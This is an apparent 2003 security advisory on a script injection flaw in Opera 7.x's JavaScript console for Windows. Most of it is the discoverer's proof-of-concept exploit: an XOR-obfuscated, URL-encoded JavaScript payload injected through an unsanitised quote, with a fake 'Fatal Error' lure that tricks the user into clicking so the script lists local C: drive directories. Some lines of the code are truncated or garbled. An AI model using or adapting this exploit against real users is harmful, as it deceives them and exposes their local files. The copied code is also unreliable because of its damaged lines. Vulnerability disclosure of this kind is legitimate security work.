Script Injection Vulnerability in Opera for Windows JavaScript Console

Reported April 28, 2003, by nesumin.

VERSIONS AFFECTED

DESCRIPTION

<span style="font-family:Verdana">A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone. This vulnerability is a result of code in Opera 7.x's console.html file that doesn't sanitize the single quotation mark. The flaw permits a malicious intruder to inject an arbitrary script into the link on the Microsoft JavaScript console.</span>

<span style="font-family:Verdana"> </span>

DEMONSTRATION

The discoverer posted the following code as proof of concept:

==============

  This code generates a link on the JavaScript console

  to read directory list from local disk "C:" and display it.

  [1] replace the "script" instead of "Xploit" and save as html file

  [2] upload to WEB server

  [3] open with Opera(enable javascript)

  [4] click a link on the JavaScript console

    ----------------------------------------------------------------

    var depth = 1;

    var startdir = "file://localhost/c:/";

    // arbitrary script

    var evil_script="";

    evil_script += "function dt(dp){";

    evil_script += "var i,j,tr,td,b;";

    evil_script += "if('complete'fr.document.readyState&&";

    evil_script += "fr.document.getElementsByTagName('base').item(0)){";

    evil_script += "tr=fr.document.getElementsByTagName('tr');b='

'";

    evil_script += "+fr.document.getElementsByTagName('base').item(0).href;";

    evil_script += "b+='
'+'Count : '+tr.length+'
';";

    evil_script += "for(i=1;i

    evil_script += "td = tr.item(i).getElementsByTagName('td');";

    evil_script += "if (td.item(0).innerText.match(/^\.\.?$/))continue;";

    evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";

    evil_script += ".item(0).src.match(/\\folder\.gif$/))";

    evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);";

    evil_script += "for (j=0;j

    evil_script += "b+='
';}tree.innerHTML+=b;";

    evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}";

    evil_script += "setTimeout('dt('+dp+');',30);}var ds = new Array(),";

    evil_script += "b = document.getElementsByTagName('body').item(0),";

    evil_script += "f = document.createElement('iframe'),";

    evil_script += "d = document.createElement('div');";

    evil_script += "d.setAttribute('id','tree');b.appendChild(d);";

    evil_script += "f.style.width=f.style.height=f.style.border=0;";

    evil_script += "f.setAttribute('src','"+startdir+"');";

    evil_script += "f.setAttribute('id','fr');";

    evil_script += "b.appendChild(f);";

    evil_script += "dt("+depth+");";

    // xor and URLEncode

    evil_script = escape(evil_script.replace(/./g,function(s){

        return(String.fromCharCode(0x80^s.charCodeAt(0)))}));

    var msg = "http://";

    // fake url

    msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";

    // code

    msg += "');m='";

    msg += evil_script;

    msg += "';eval(unescape(m).replace(/./g,function(s){";

    msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+'";

    // fake message

    msg += "";

    msg += "Fatal Error !!!!";

    msg += "  Please click above link."; // :p

    opera.postError(msg);

    //window.open("file://localhost/console.html","","");

    location.href = "file://localhost/console.html";

    ----------------------------------------------------------------

VENDOR RESPONSE

<span style="font-family:Verdana"><a href="https://www.opera.com/" style="color: blue; text-decoration: underline; text-underline: single">Opera</a> has yet to respond to this problem.</span>

CREDIT                                                                                                       
Discovered bynesumin.